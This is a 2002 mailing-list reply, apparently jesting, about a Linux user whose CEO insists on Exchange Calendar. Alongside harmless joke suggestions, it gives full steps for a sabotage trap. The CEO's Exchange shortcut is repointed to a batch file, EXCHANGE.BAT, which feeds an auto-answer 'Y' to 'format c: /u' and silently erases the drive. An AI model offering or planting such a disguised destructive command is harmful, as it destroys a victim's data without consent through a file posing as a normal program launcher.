Re: Exchange Calendar client?

On Fri, Dec 13, 2002 at 09:28:44AM +0100, Holger Rauch wrote:
> On Thu, 12 Dec 2002, Robert L. Harris wrote:
>
> > Not an option, the CEO is doing the "exchange is the only true calendar
> > app!" thing.  I'd rather not come back with a "but linux doesn't work
> > nicely with that proprietary, bloated PoS" as he'd only hear "linux
> > doesn't work"...
>
> Then tell your CEO that he is wrong.

Or turn it the other way round: "Exchange doesn't work properly with a
decent reliable operating system." Chances are he won't know what an
operating system is, and he'll only hear "Exchange doesn't work..."

Or send him a fake Microsoft parcel containing some fake "Latest
upgrade to Exchange" box which looks like the sort of box you get
software in but actually contains a desk diary and a pen.

Or create on his system a file eg. C:\WINDOWS\COMMAND\Y.TXT containing
the letter Y followed by a CR/LF, then edit his Exchange shortcut to
point to say C:\WINDOWS\COMMAND\EXCHANGE.BAT which contains:

@echo off
format c: /u < c:\windows\command\y.txt

Pigeon